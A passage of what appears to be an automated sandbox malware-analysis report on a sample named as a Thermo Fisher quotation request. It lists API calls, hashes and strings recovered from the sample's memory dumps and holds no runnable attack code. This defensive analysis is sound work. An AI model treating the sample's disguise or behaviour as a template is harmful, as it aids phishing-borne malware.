                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: 8cb169c358c4bcac9286375bd73e0e257615ae5146a92f84b7770cc497e6b828
                                                              • Instruction ID: 755dd8e25e3d3b003c7a07f282e6cff250b3ccab49023312fe599f6f901c11dc
                                                              • Opcode Fuzzy Hash: 8cb169c358c4bcac9286375bd73e0e257615ae5146a92f84b7770cc497e6b828
                                                              • Instruction Fuzzy Hash: F3513A30A0479529FB35DBB488207EABFF65F11340F98458ED5C2473C2DA549B8CC762
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000001), ref: 0063ED1E
                                                              • GetWindowRect.USER32(00000000,?), ref: 0063ED30
                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0063ED8E
                                                              • GetDlgItem.USER32(?,00000002), ref: 0063ED99
                                                              • GetWindowRect.USER32(00000000,?), ref: 0063EDAB
                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0063EE01
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0063EE0F
                                                              • GetWindowRect.USER32(00000000,?), ref: 0063EE20
                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0063EE63
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0063EE71
                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0063EE8E
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0063EE9B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                              • String ID:
                                                              • API String ID: 3096461208-0
                                                              • Opcode ID: 56350a42f92f4e040171f3ed3c5fbbbdff6415ccf6aec0163b59bc9f4967a1fb
                                                              • Instruction ID: 64c52440f46a7a9bd89213b5a392e14c2269ce805890d9f1a545181a13fd4090
                                                              • Opcode Fuzzy Hash: 56350a42f92f4e040171f3ed3c5fbbbdff6415ccf6aec0163b59bc9f4967a1fb
                                                              • Instruction Fuzzy Hash: 43512271B00209BFDB18CF69CD85AAEBBB6EB88310F148229F519D72D0D7719D408B60
                                                              APIs
                                                                • Part of subcall function 0061B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0061B759,?,00000000,?,?,?,?,0061B72B,00000000,?), ref: 0061BA58
                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0061B72B), ref: 0061B7F6
                                                              • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0061B72B,00000000,?,?,0061B2EF,?,?), ref: 0061B88D
                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0067D8A6
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0061B72B,00000000,?,?,0061B2EF,?,?), ref: 0067D8D7
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0061B72B,00000000,?,?,0061B2EF,?,?), ref: 0067D8EE
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0061B72B,00000000,?,?,0061B2EF,?,?), ref: 0067D90A
                                                              • DeleteObject.GDI32(00000000), ref: 0067D91C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                              • String ID:
                                                              • API String ID: 641708696-0
                                                              • Opcode ID: df77ce492cffefc64f45064755761d9660d038fdcb83fe06bd954a0688cc835a
                                                              • Instruction ID: c5308efd30b53d23a0e9cdb3d991b8491ba7f1a71607a25f17ed840ea3ca77b1
                                                              • Opcode Fuzzy Hash: df77ce492cffefc64f45064755761d9660d038fdcb83fe06bd954a0688cc835a
                                                              • Instruction Fuzzy Hash: F361BA30500600DFDB259F1AD988BB5B7B7FF86726F18691DE0468AAB0C730A8D1DF90
                                                              APIs
                                                                • Part of subcall function 0061B526: GetWindowLongW.USER32(?,000000EB), ref: 0061B537
                                                              • GetSysColor.USER32(0000000F), ref: 0061B438
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ColorLongWindow
                                                              • String ID:
                                                              • API String ID: 259745315-0
                                                              • Opcode ID: 0ced5e80d0de6511e676f20441567e3b3e607e1563d9353684157f46e70d8d77
                                                              • Instruction ID: db002c5b72a21db067a8c0ed7ee3841e2a6dcfe310bd2a797f8bdf4dfef62c90
                                                              • Opcode Fuzzy Hash: 0ced5e80d0de6511e676f20441567e3b3e607e1563d9353684157f46e70d8d77
                                                              • Instruction Fuzzy Hash: 64418330100144ABDF215F68D889BF93BA7AF46731F189355FDA58E2EAD7308C82D761
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                              • String ID:
                                                              • API String ID: 136442275-0
                                                              • Opcode ID: 40abc59879cf6490e0d524dd95e0d98f7e0592c0b6209e0fbc3cdced73d14238
                                                              • Instruction ID: 7f023e20c6ee37b8456235ff9d9e81636b4b325fb653ee513f4037341c2174f6
                                                              • Opcode Fuzzy Hash: 40abc59879cf6490e0d524dd95e0d98f7e0592c0b6209e0fbc3cdced73d14238
                                                              • Instruction Fuzzy Hash: B2415F7684512CAFDFA1EB90DC85DCB73BEEF44300F0041A6FA59A2041EA30ABE48F55
                                                              APIs
                                                              • CharLowerBuffW.USER32(0069DC00,0069DC00,0069DC00), ref: 0064D7CE
                                                              • GetDriveTypeW.KERNEL32(?,006B3A70,00000061), ref: 0064D898
                                                              • _wcscpy.LIBCMT ref: 0064D8C2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                              • API String ID: 2820617543-1000479233
                                                              • Opcode ID: d57cb864f80ad05a8fec4eefed81ea596ad26972f5c9bea147bd23c3ba1813e4
                                                              • Instruction ID: be612317751e94ae31b6e9ab062d6eae310f03ad2abf83cabab4749abb906198
                                                              • Opcode Fuzzy Hash: d57cb864f80ad05a8fec4eefed81ea596ad26972f5c9bea147bd23c3ba1813e4
                                                              • Instruction Fuzzy Hash: 6251DF70604201AFC740EF14C891AAFB7A7EF94314F24892DF8AA572A2DB31DD45CB86
                                                              APIs
                                                              • __swprintf.LIBCMT ref: 006093AB
                                                              • __itow.LIBCMT ref: 006093DF
                                                                • Part of subcall function 00621557: _xtow@16.LIBCMT ref: 00621578
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf_xtow@16
                                                              • String ID: %.15g$0x%p$False$True
                                                              • API String ID: 1502193981-2263619337
                                                              • Opcode ID: a079126081e0aee420df82c8fd4f4f56657866f0fd0ccfef78c9af84825c5654
                                                              • Instruction ID: 570bbc6ea858be100636be256af923a850a91dba0b7bbd2fbe0a9c0730ab35d6
                                                              • Opcode Fuzzy Hash: a079126081e0aee420df82c8fd4f4f56657866f0fd0ccfef78c9af84825c5654
                                                              • Instruction Fuzzy Hash: DF41D471644614AFDB2CDB74D945EAA73EBEF45300F24846EE149D72D2EB319942CF20
                                                              APIs
                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0066A259
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0066A260
                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0066A273
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0066A27B
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0066A286
                                                              • DeleteDC.GDI32(00000000), ref: 0066A28F
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0066A299
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0066A2AD
                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0066A2B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                              • String ID: static
                                                              • API String ID: 2559357485-2160076837
                                                              • Opcode ID: b00a1c2ecbfc0d6eb3428ec953c2d92df48b051c49503db6dc8e21576c754cb0
                                                              • Instruction ID: 57e57f19bce44dd4f9a0dccaf1ea53d078ab0d64ab54a876cd3c5c857b4cce2d
                                                              • Opcode Fuzzy Hash: b00a1c2ecbfc0d6eb3428ec953c2d92df48b051c49503db6dc8e21576c754cb0
                                                              • Instruction Fuzzy Hash: F3316731140218BBDF219FA4DC49FEA3B6AFF0A364F140314FA19A61E0C736D851DBA4
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                              • String ID: 0.0.0.0
                                                              • API String ID: 2620052-3771769585
                                                              • Opcode ID: d8f9bad3340679449b2df777f068a5e28bfdbf05d28726684f772013904ebae6
                                                              • Instruction ID: 8924dd38daa3eb4622463671d62c42139501d030611dc7b938681ce08c9e0f46
                                                              • Opcode Fuzzy Hash: d8f9bad3340679449b2df777f068a5e28bfdbf05d28726684f772013904ebae6
                                                              • Instruction Fuzzy Hash: 59115971504114BFDB64AB70EC4AEDA77BFEF01710F000169F045A2182EF70EE858B65
                                                              APIs
                                                              • _memset.LIBCMT ref: 00625047
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              • __gmtime64_s.LIBCMT ref: 006250E0
                                                              • __gmtime64_s.LIBCMT ref: 00625116
                                                              • __gmtime64_s.LIBCMT ref: 00625133
                                                              • __allrem.LIBCMT ref: 00625189
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006251A5
                                                              • __allrem.LIBCMT ref: 006251BC
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006251DA
                                                              • __allrem.LIBCMT ref: 006251F1
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0062520F
                                                              • __invoke_watson.LIBCMT ref: 00625280
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                              • String ID:
                                                              • API String ID: 384356119-0
                                                              • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                              • Instruction ID: 2cb07006c08352a51248aa0952a43a0864bcebc10fbbfad9b0eb64005af0667f
                                                              • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                              • Instruction Fuzzy Hash: 0B71D571A01F27ABE7249E68DC41BAA73AAAF01364F14422DF411DA7C1E770DE408FD4
                                                              APIs
                                                              • _memset.LIBCMT ref: 00644DF8
                                                              • GetMenuItemInfoW.USER32(006C1708,000000FF,00000000,00000030), ref: 00644E59
                                                              • SetMenuItemInfoW.USER32(006C1708,00000004,00000000,00000030), ref: 00644E8F
                                                              • Sleep.KERNEL32(000001F4), ref: 00644EA1
                                                              • GetMenuItemCount.USER32(?), ref: 00644EE5
                                                              • GetMenuItemID.USER32(?,00000000), ref: 00644F01
                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00644F2B
                                                              • GetMenuItemID.USER32(?,?), ref: 00644F70
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00644FB6
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00644FCA
                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00644FEB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                              • String ID:
                                                              • API String ID: 4176008265-0
                                                              • Opcode ID: 5e1291e41dd8b641bee90661909b47145059631c398e24e32f42111a75a4dd93
                                                              • Instruction ID: 1df5dd537f5653c2414b10db69e34948946e7905f5f4c4de648ab8815615325a
                                                              • Opcode Fuzzy Hash: 5e1291e41dd8b641bee90661909b47145059631c398e24e32f42111a75a4dd93
                                                              • Instruction Fuzzy Hash: CA619071A00249AFDB51DFA4D885EFE7BBBFB81308F14055AF442A7291DB31AD49CB21
                                                              APIs
                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00669C98
                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00669C9B
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00669CBF
                                                              • _memset.LIBCMT ref: 00669CD0
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00669CE2
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00669D5A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$LongWindow_memset
                                                              • String ID:
                                                              • API String ID: 830647256-0
                                                              • Opcode ID: d3c6b463e7b3112b448eb31edf0ebd957e84f6ccaaca785e39f1f9ee27ebea36
                                                              • Instruction ID: 1c0ec8e10164b1d20446c62ecb5c6b932ea98fca7c323e7a5864584c8ed5debd
                                                              • Opcode Fuzzy Hash: d3c6b463e7b3112b448eb31edf0ebd957e84f6ccaaca785e39f1f9ee27ebea36
                                                              • Instruction Fuzzy Hash: 03616C75A00208AFDB10DFA4CC81EEE77B9EF0A714F144159FA04AB292D770AD42DB60
                                                              APIs
                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 006394FE
                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00639549
                                                              • VariantInit.OLEAUT32(?), ref: 0063955B
                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 0063957B
                                                              • VariantCopy.OLEAUT32(?,?), ref: 006395BE
                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 006395D2
                                                              • VariantClear.OLEAUT32(?), ref: 006395E7
                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 006395F4
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006395FD
                                                              • VariantClear.OLEAUT32(?), ref: 0063960F
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0063961A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                              • String ID:
                                                              • API String ID: 2706829360-0
                                                              • Opcode ID: d82d33bf0ca84e6be7f457152925d60dfe7d6daf55b6be95db3fcf1760ea82e8
                                                              • Instruction ID: 688d4662fca746c44958a5ae0ef7a23ad39cbaa01af9c0846fe9e8b596510bb9
                                                              • Opcode Fuzzy Hash: d82d33bf0ca84e6be7f457152925d60dfe7d6daf55b6be95db3fcf1760ea82e8
                                                              • Instruction Fuzzy Hash: 9E414E71900219AFDB01EFA4D8849DEBBBAFF08354F008169E542A3251DB71EA85CFB4
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$_memset
                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?k$|?k
                                                              • API String ID: 2862541840-1975539356
                                                              • Opcode ID: e09f76fa3a8c60583130e7f2a68ec86f744911184f7033f3a31e367f6446b770
                                                              • Instruction ID: e364b4a98bc335f2ea972176724e4f78190a406cc3ef5db60bd558f91565f9d1
                                                              • Opcode Fuzzy Hash: e09f76fa3a8c60583130e7f2a68ec86f744911184f7033f3a31e367f6446b770
                                                              • Instruction Fuzzy Hash: 5291B271A00219ABDF24DFA4CC44FEEBBBAEF45711F109159F905AB281DB709949CFA0
                                                              APIs
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                              • CoInitialize.OLE32 ref: 0065ADF6
                                                              • CoUninitialize.OLE32 ref: 0065AE01
                                                              • CoCreateInstance.OLE32(?,00000000,00000017,0068D8FC,?), ref: 0065AE61
                                                              • IIDFromString.OLE32(?,?), ref: 0065AED4
                                                              • VariantInit.OLEAUT32(?), ref: 0065AF6E
                                                              • VariantClear.OLEAUT32(?), ref: 0065AFCF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                              • API String ID: 834269672-1287834457
                                                              • Opcode ID: 98f4c4f1aebb4ed0099737baeaa30ac0b67d40ccdf1bc5e76c188340001f17e7
                                                              • Instruction ID: dfe0ac4dfd7d9eccfc1840a1396cda707a5fb92874c14188dd27af790f54f54d
